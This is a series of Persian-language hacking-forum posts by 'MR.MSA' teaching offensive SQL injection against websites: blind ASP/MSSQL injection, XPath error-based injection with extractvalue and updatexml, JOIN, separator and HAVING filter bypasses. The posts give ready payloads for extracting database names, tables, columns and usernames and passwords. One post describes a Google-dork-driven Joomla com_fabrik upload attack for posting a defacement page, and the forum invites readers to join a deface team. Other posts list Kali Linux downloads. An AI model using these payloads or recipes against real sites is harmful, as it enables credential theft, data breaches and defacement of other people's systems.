MR.MSA

سلام چرا راه های دیگه هم هست توی نت سرچ کنید .
و اینکه ممکن هست باگ رو نداشته باشه همه جا که کار نمی کنه .

اون تگ کتیشن برا یه موقع دیگس
من خودم حرفه ای sql injection رو کار کردم . 
و اینکه یه سایت ممکنه تو پارامتر دهی باگ داشته باشه اما دلیل نمیشه صفحه ادمین هم باگ داشته باشه .

sql injection اصلش برای زمانی هست که پارامتر دهی انجام می شود . 
تو این تاپیک می توانید ویدئو ها رو مشاهده کنید تا بهتر متوجه شوید . 
 

خواهش میکنم . 
در ضمن می توانید برای یادگیری و یا عضویت در تیم دیفیس به سرور دیسکورد گاردایران بپیوندید .
و برای تشکر از دکمه کنار تاپیک ها استفاده کنید !
این بهترین تشکری که می تونید انجام بدید . (تاپیک هایی که مورد پسند بودن !)

 
 

با سلام خدمت شما 
برای اینجور مسائل تاپیک ها بسته نمیشه و از این نظر نگران نباشید . 
ممنون از فعالیت شما ، موفق و پیروز باشید. 

با سلام خدمت شما کاربران و مدیران عزیز گارد ایران
در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . 
Blind to asp
 
 
تست اسیب پذیری : 
 
and 1=1 باید لود شود و and 1=2 نباید لود شود .
 
نام دیتابیس
 
با دستور :
 and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97
 
 
97 که با کد ascii می شود a
 و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید
یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن
همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . 
ببخشید که یک کمی طولانی شد . 
 --------- --------- --------- --------- --------- --------- --------- --------- --------- ---------
نکته : 
اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌)
 
99 ‌<  true
100 > true
99 = false
 
یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت :  
 
This is the hidden content, please ورود یا ثبت نام  --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- 
بیرون کشیدن نام دیتابیس های بعدی : 
 
and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97
 
 
برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد .  
 
مثال : 
 
and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97
and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98
and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102
and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107
  --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- 
 
چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم . 

با سلام خدمت دوستان عزیز در این پست همانطور که گفتم قرار است بیرون کشیدن تیبل ها را به شما آموزش دهم . 
 
بیرون کشیدن تیبل ها :
 
and isnull (ascii(substring(cast((select top 1 lower (name) from sysobjects where xtype=0x55 and name not in (select top 1  lower (name) from sysobjects where xtype=0x55))as varcher (8000)),1,1)),0)>97
 
برای حرف دوم ، عدد بنفش را یکی یکی اضافه کنید
و بقیه چیز ها هم مثل blind معمولی  است و اینکه مثلا شما امدید و تمام حرف های تیبل اول را بدست اوردید اما بدرد شما نخورد برای اینکه بروید تیبل دوم  
ان عدد بعد از top (که ابی و بولد است) را یکی یکی اضافه کنید .  
در پست بعد به شما آموزش بیرون کشیدن ستون ها رو میدم . 
دوستانی که متد blind در سایت های php بلد نیستند و یا دوست دارند تا من آموزش متد blind در سایت های php را بزارم از این پست حمایت کنند .

همانطور که گفتم در در این پست قصد دارم آموزش بیرون کشیدن ستون ها رو بدم . 
بیرون کشیدن ستون های یک جدول :
 
 
and isnull (ascii(substring(cast((select p.name from(select (select count  (i.colid)rid from syscolumns i where (i.colid<=o.colid)and id=(select id from sysobjects where name=’X’ ))x,name from syscolumns o where id=(select id from sysobject where  name=’X’))p where(p.x=1))  as varcher (8000)),1,1)),0)>97
 
 
در دو قسمتی که این X قرار داشت نام تیبل مهم را بنویسید و عدد ۹۷ که ابی هست یعنی نشان دهنده حروف در ستون ها می تواند کمتر ش هم کنید ( یعنی می تواند حروف بزرگ هم باشد. )
و عدد بنفش هم برای رفتن به کاراکتر بعدی هست و برای اینکه بروید ستون بعد ان عدد ۱ که بولد و سبز است را زیاد می کنید و بقیه مراحل هم مثل روش های قبل .
 
امیدوارم از این پست لذت برده باشید و در پست بعد آموزش بیرون کشیدن اطلاعات ستون ها بهتون میدم .
خوش باشید .

بیرون کشیدن اطلاعات ستون های یک جدول :
 
and  ascii(substring(select column from table where masir),1,1))>97
 
به جای column نام ستون مورد نظر را بنویسید و به جای table نام تیبل مهم را بنویسید و به جای masir چیز های متد GET ( به غییر از چیز هایی که خودمان نوشته ایم )یعنی مثلا id=1 و بقیه مراحل هم به همین صورت برای بیرو کشیدن حرف اول همان عدد 97 را تغییر و برای رفتن به کاراکتر بعدی همان عدد  1 همیشگی .
امیدوارم لذت برده باشید  ، ببخشید که یک زره پست بخش بخش شد در پست های بعد این مشکل رو حل می کنم. 
 
 
 

با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . 
Xpath injection
 
 
کاربرد :
 
1.    مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید .
2.    زمانی که به ارورnumber of column  the diffrent باید از این متد استفاده کنید . 
3.    زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون  اسیب پذیر را نشان ندهد .
4.     و.....
 -------------- -------------- --------------
روش استفاده از متد xpath
 
اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و ....
 اگر مشکل حل نشد به سراغ این متد میاید .
آموزش متد xpath :
 
بدست اوردن ورژن : 
 
This is the hidden content, please ورود یا ثبت نام  
0x7e به معنای علامت (~) است .
version() به معنای ورژن سایت است.
در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
 

خب همانطور که گفتم در این آموزش قرار است به شما بیرون کشیدن تیبل ها را در متد Xpath آموزش دهم. 

بدست اوردن تیبل ها :‌
 
This is the hidden content, please ورود یا ثبت نام select : برای نمایش ،
 table_name : نام تیبل ،
: from+information_schema.tables  در تیبل های این قسمت  ، 
limit 0,1 برای شمردن تیبل ها . 
 
برای شمردن یکی یکی عدد limit (توجه ولیوی اول یعنی 0) را زیاد کنید .
و اینکه 0 که گذاشتیم خودش معنای ۱ را می دهد . 
 
  برای محدود کردن تیبل ها که تیبل های پیش فرض را نشان ندهد :
 
This is the hidden content, please ورود یا ثبت نام و مثل بالا یکی یکی limit را اضافه می کنید .  
. در آموزش بعدی به شما بیرون کشیدن ستون ها را آموزش می دهم 
. دوستان توجه داشته باشند که من فایل ورد متد ها رو دارم و هر که نیاز داشت به من پیام بدهد 

بیرون کشیدن ستون ها :
 
 
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--
به جای هکز مساوی با تیبل نیم مهم نام تیبل را به صورت هکز بنویسید . (با 0x )
و برای اینکه تمام ستون ها را بیرون بکشید باید یکی یکی عدد limit را زیاد کنید . 
-----------------
مثال : 
 
ستون اول =
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+0,1)))--
ستون دوم =
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+1,1)))--
 
ستون سوم = 
…..?sa=12+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name={hex = table name mohem}+limit+2,1)))--
و....
 
----------- ----------- ----------- -----------
 
بیرون کشیدن username و password :‌
 
This is the hidden content, please ورود یا ثبت نام  
 
در قسمت تیبل نیم مهم نام تیبل مهم خود را بدون هکز کردن بنویسید .
 
----------------------------------------------------------------------------------------------------------------
نکته : اگر یک زمان سایت به extractvalue حساس بود یا به هر ارور دریافت کردید می توانید از جاگزین ان استفاده کنید یعنی : 
 
updatexml
 
برا اینکه بفهمید بر روی سایت updatexml کار می کند باید اول این دستور را بزنید :‌
 
This is the hidden content, please ورود یا ثبت نام  
و اگر خطایی دریافت کردید مثل : 
 
This is the hidden content, please ورود یا ثبت نام یعنی سایت به updatexml حساس نیست . 
 
و اولین دستور برای بدست اوردن ورژن :‌
 
This is the hidden content, please ورود یا ثبت نام  
 
و بیرون کشیدن تیبل ها و محدود سازی دیتابیس :
 
This is the hidden content, please ورود یا ثبت نام  
برای نشان دادن تیبل های بعدی ولیوی اول limit را اضافه کنید . (توجه داشته باشید که خود صفر تیبل اول است )
 
 
بیرون کشیدن ستون ها :
 
This is the hidden content, please ورود یا ثبت نام  
و برای نشان دادن ستون مهم لیمیت را یکی یکی اضافه کنید و به جای {hex = table name mohem} هکز شده ی تیبل مهم خود را بگذارید .
 
 
بیرون کشیدن password و username : 
This is the hidden content, please ورود یا ثبت نام  
 به جای تیبل نیم نام تیبل را بنویسید بدون هکز کردن و به جای یوزرنیم و پسورد نام دو ستون مهم را بنویسید و یکی یکی لیمیت را زیاد کنید تا یوزر و پسورد بعدی را نمایش دهد.  
امیدوارم لذت برده باشید و سعی کردم بیشتر توضیحات رو بدم و پست چند بخشی نشود . 
 

Fabrik
 
موارد قابل استفاده : 
در سایت های جوملا قابل استفاده است .
یکی از زیر مجموعه های RFI
در سایت هایی که این ادرس را دارند (دورک): index.php?option=com_fabrik
....و
 
 
Dork : inurl:index.php?option=com_fabrik
 
مراحل متد :‌
 
۱ ) دورک را بزنید و یک سایت را انتخاب کنید و اگر صفحه بدون خطای ۴۰۴ ، ۴۰۱ و ۵۰۰ لود شد یعنی به احتمال زیاد  این باگ را دارد . (مطمئن شوید که سایت با cms جوملا هست )
 
۲) این اکسپلویت را به ادرس سایت اضافه کنید .
 
This is the hidden content, please ورود یا ثبت نام  
۳) سپس فایل خود را آپلود کنید .( اون فایل می توانید دیفیس پیج شما باشد . ) 
 
۴) این ادرس را به سایت اضافه و به جای (FILE_NAME) نام فایل خودتان را بنویسید .
 
This is the hidden content, please ورود یا ثبت نام  
 

بایپس نشان ندادن ستون آسیب پذیر 
اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید .
 
نوع having ها : 
Having null
Having false
Having 0
Having 1 like 0
Having 1 limit 0
 
به این صورت : 
 
 
This is the hidden content, please ورود یا ثبت نام  
در جایی که نوشته شده <having> باید نوع having را بنویسید . 
 
 
مثال : 
 
This is the hidden content, please ورود یا ثبت نام  
 
تمام having ها را انجام دهید تا به نتیجه برسید .
امیدوارم لذت برده باشید .
💙 فراموش نشه  😍
 

با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN
در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . 
متد separator‌ :
در زمان مرتب سازی تیبل ها ، ستون ها  و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : 
..........(group_concat(table_name,0x3c62723e......
حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : 
.......( group_concat((table_name)separator 0x3c62723e......
زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . 
ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید . 
 

برای دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ به لینک های زیر مراجعه کنید : 
دانلود کالی لینوکس نسخه ۲۰۱۸.۱
  This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   846M     This is the hidden content, please ورود یا ثبت نام   479M     This is the hidden content, please ورود یا ثبت نام   589M     This is the hidden content, please ورود یا ثبت نام   846M     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.6G   دانلود کالی لینوکس نسخه ۲۰۱۸.۲
 
  This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.5G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   865M     This is the hidden content, please ورود یا ثبت نام   642M     This is the hidden content, please ورود یا ثبت نام   864M     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.6G   دانلود کالی لینوکس نسخه ۲۰۱۸.۳
 
  This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   854M     This is the hidden content, please ورود یا ثبت نام   639M     This is the hidden content, please ورود یا ثبت نام   851M     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.8G   دانلود کالی لینوکس نسخه ۲۰۱۸.۴
  This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   867M     This is the hidden content, please ورود یا ثبت نام   629M     This is the hidden content, please ورود یا ثبت نام   863M     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.7G   دانلود کالی لینوکس نسخه ۲۰۱۹.۱
 
  This is the hidden content, please ورود یا ثبت نام   3.2G     This is the hidden content, please ورود یا ثبت نام   3.3G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   3.5G     This is the hidden content, please ورود یا ثبت نام   931M     This is the hidden content, please ورود یا ثبت نام   682M     This is the hidden content, please ورود یا ثبت نام   929M     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   3.0G   دانلود کالی لینوکس نسخه ۲۰۱۹.۱a
 
  This is the hidden content, please ورود یا ثبت نام   3.2G     This is the hidden content, please ورود یا ثبت نام   3.4G     This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   3.5G     This is the hidden content, please ورود یا ثبت نام   1.0G     This is the hidden content, please ورود یا ثبت نام   693M     This is the hidden content, please ورود یا ثبت نام   1.0G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   3.2G     This is the hidden content, please ورود یا ثبت نام   3.1G   دانلود کالی لینوکس نسخه ۲۰۱۹.۲
 
  This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   3.2G     This is the hidden content, please ورود یا ثبت نام   3.0G     This is the hidden content, please ورود یا ثبت نام   3.4G     This is the hidden content, please ورود یا ثبت نام   951M     This is the hidden content, please ورود یا ثبت نام   741M     This is the hidden content, please ورود یا ثبت نام   949M     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   3.0G   دانلود کالی لینوکس نسخه ۲۰۱۹.۳
 
  This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   3.2G     This is the hidden content, please ورود یا ثبت نام   3.5G     This is the hidden content, please ورود یا ثبت نام   1.0G     This is the hidden content, please ورود یا ثبت نام   802M     This is the hidden content, please ورود یا ثبت نام   1.0G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.7G   دانلود کالی لینوکس نسخه ۲۰۱۹.۴
  This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   3.1G     This is the hidden content, please ورود یا ثبت نام   1.1G     This is the hidden content, please ورود یا ثبت نام   792M     This is the hidden content, please ورود یا ثبت نام   1.1G     This is the hidden content, please ورود یا ثبت نام   2.5G     This is the hidden content, please ورود یا ثبت نام   2.7G   ----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و لذت کافی رو برده باشید .
 سعی کردم بیشتر نسخه ها رو بزارم و اینکه تمام نسخه ها از سایت کالی لینوکس است .
********** MR.MSA ***********
 
  
< آموزش متد join در sql injection >
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >
<دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس>

برای دانلود نسخه های کالی لینوکس ۱ تا ۲  به لینک های زیر مراجعه کنید :
 
دانلود کالی لینوکس نسخه ۱.۰.۰
 
This is the hidden content, please ورود یا ثبت نام   2.0G     This is the hidden content, please ورود یا ثبت نام      386M       This is the hidden content, please ورود یا ثبت نام     413M       دانلود کالی لینوکس نسخه ۱.۰.۲
2.2G     
This is the hidden content, please ورود یا ثبت نام 2.3G          kali-linux-1.0.2-i386.iso دانلود کالی لینوکس نسخه ۱.۰.۳
 
2.3G            This is the hidden content, please ورود یا ثبت نام   This is the hidden content, please ورود یا ثبت نام         2.2G دانلود کالی لینوکس نسخه ۱.۰.۴
2.3G      
This is the hidden content, please ورود یا ثبت نام 2.0G  
This is the hidden content, please ورود یا ثبت نام 2.4G           
This is the hidden content, please ورود یا ثبت نام 1.8G 
This is the hidden content, please ورود یا ثبت نام دانلود کالی لینوکس نسخه ۱.۰.۵
1.5G   
This is the hidden content, please ورود یا ثبت نام 2.4G       
This is the hidden content, please ورود یا ثبت نام 1.4G   This is the hidden content, please ورود یا ثبت نام
2.4G             This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۶
2.9G      This is the hidden content, please ورود یا ثبت نام
2.0G   This is the hidden content, please ورود یا ثبت نام
1.9G  This is the hidden content, please ورود یا ثبت نام
3.0G            This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۷
2.8G       This is the hidden content, please ورود یا ثبت نام
2.1G   This is the hidden content, please ورود یا ثبت نام
2.0G   This is the hidden content, please ورود یا ثبت نام
2.9G            This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۸
2.9G       This is the hidden content, please ورود یا ثبت نام
2.1G  This is the hidden content, please ورود یا ثبت نام
2.0G   This is the hidden content, please ورود یا ثبت نام
3.0G            This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۹
2.8G       This is the hidden content, please ورود یا ثبت نام
1.9G   This is the hidden content, please ورود یا ثبت نام
1.9G   This is the hidden content, please ورود یا ثبت نام
2.9G           This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۰.۹a
2.8G     This is the hidden content, please ورود یا ثبت نام
2.0G  This is the hidden content, please ورود یا ثبت نام
1.9G  This is the hidden content, please ورود یا ثبت نام
2.9G          This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۱.۱.۰
2.8G      This is the hidden content, please ورود یا ثبت نام
1.9G  kali-linux-1.1.0-armhf.img.xz
2.9G           This is the hidden content, please ورود یا ثبت نام
2.0G  
This is the hidden content, please ورود یا ثبت نام دانلود کالی لینوکس نسخه ۱.۱.۰a
2.9G     This is the hidden content, please ورود یا ثبت نام
2.0G  This is the hidden content, please ورود یا ثبت نام
2.0G  This is the hidden content, please ورود یا ثبت نام
3.0G          This is the hidden content, please ورود یا ثبت نام
دانلود کالی لینوکس نسخه ۲.۰.۰
3.1G          This is the hidden content, please ورود یا ثبت نام
 3.2G             This is the hidden content, please ورود یا ثبت نام
864M    This is the hidden content, please ورود یا ثبت نام
624M   This is the hidden content, please ورود یا ثبت نام 587M   This is the hidden content, please ورود یا ثبت نام
917M            This is the hidden content, please ورود یا ثبت نام
 
----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و سعی کردم بیشتر نسخه ها رو بزارم .
 
********* MR.MSA **********
 
< آموزش متد join در sql injection >

برای دانلود نسخه های کالی لینوکس ۲۰۱۶ و ۲۰۱۷ به لینک های زیر مراجعه کنید :
دانلود کالی لینوکس نسخه ۲۰۱۶.۱
  This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   1.0G     This is the hidden content, please ورود یا ثبت نام   705M     This is the hidden content, please ورود یا ثبت نام   670M     This is the hidden content, please ورود یا ثبت نام   1.0G   دانلود کالی لینوکس نسخه ۲۰۱۶.۲
  This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   1.1G     This is the hidden content, please ورود یا ثبت نام   671M     This is the hidden content, please ورود یا ثبت نام   713M     This is the hidden content, please ورود یا ثبت نام   1.1G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.7G   دانلود کالی لینوکس نسخه ۲۰۱۷.۱
  This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.4G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   816M     This is the hidden content, please ورود یا ثبت نام   472M     This is the hidden content, please ورود یا ثبت نام   585M     This is the hidden content, please ورود یا ثبت نام   833M     This is the hidden content, please ورود یا ثبت نام   2.5G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.5G   دانلود کالی لینوکس نسخه ۲۰۱۷.۲
  This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.9G     This is the hidden content, please ورود یا ثبت نام   858M     This is the hidden content, please ورود یا ثبت نام   484M     This is the hidden content, please ورود یا ثبت نام   601M     This is the hidden content, please ورود یا ثبت نام   871M     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.8G     This is the hidden content, please ورود یا ثبت نام   2.7G   دانلود کالی لینوکس نسخه ۲۰۱۷.۳
  This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   2.5G     This is the hidden content, please ورود یا ثبت نام   2.7G     This is the hidden content, please ورود یا ثبت نام   823M     This is the hidden content, please ورود یا ثبت نام   477M     This is the hidden content, please ورود یا ثبت نام   583M     This is the hidden content, please ورود یا ثبت نام   838M     This is the hidden content, please ورود یا ثبت نام   2.5G     This is the hidden content, please ورود یا ثبت نام   2.6G     This is the hidden content, please ورود یا ثبت نام   2.5G  
----------------------------------------------------------------------------
امیدوارم پست خوبی رو گذاشته باشم و لذت کافی رو برده باشید .
 سعی کردم بیشتر نسخه ها رو بزارم و اینکه تمام نسخه ها از سایت کالی لینوکس است .
********* MR.MSA **********
 
< آموزش متد join در sql injection >
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >
 
                                                                                                             

با سلام همانطور که در  آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . 
 
در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد :
union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
پس شما باید از این دستور استفاده کنید : 
site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . 
------------------------------
برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید :
site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
------------------------------
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید .
هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید .
************ MR.MSA ************
<آموزش متد polygon در sql injection >
< آموزش متد join در sql injection >
<دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس>
<دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس>
<دانلود نسخه های ۱ تا ۲ کالی لینوکس >

با سلام خدمت شما کاربران عزیز انجمن گارد ایران 
در این پست می خواهم متد join رو در باگ sql injection  به شما آموزش بدهم . 
------------------------
موارد قابل استفاده : 
۱- مواجه شدن با خطا زمان استفاده از union select 
۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list
۳- زمانی که سایت به عدد حساس است . 
۴- و....
------------------------
نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از 
/**/
استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . 
------------------------
نحوه استفاده از متد join :‌
----------------------------------------
( برای مثال تعداد تیبل های سایت ۵ تا می باشد. )
مرحله اول بیرون کشیدن ستون آسیب پذیر :‌
+union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+
و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار  select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید :    from *
توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join
----------------------------------------
( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲  آسیب پذیر است. ) 
مرحله دوم بدست آوردن ورژن : 
+union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23
 
----------------------------------------
مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) :
union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم
و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید .
----------------------------------------
( برای مثال در بین تیبل ها تیبل msa_users وجود دارد  . ) 
مرحله چهارم بیرون کشیدن ستون های یک تیبل : 
union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید  .
ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست .
----------------------------------------
( برای مثال در خروجی ستون های user و pass مهم است . ) 
مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : 
union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+
به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. 
می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید.
و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است )
 
----------------------------------------
 
امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم 
برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . 
هر گونه سوال در مورد پست داشتید بپرسید .
 
********* MR.MSA **********
 
 
 
 

This is the hidden content, please ورود یا ثبت نام

با سلام خدمت کاربران و مدیران انجمن گارد ایران
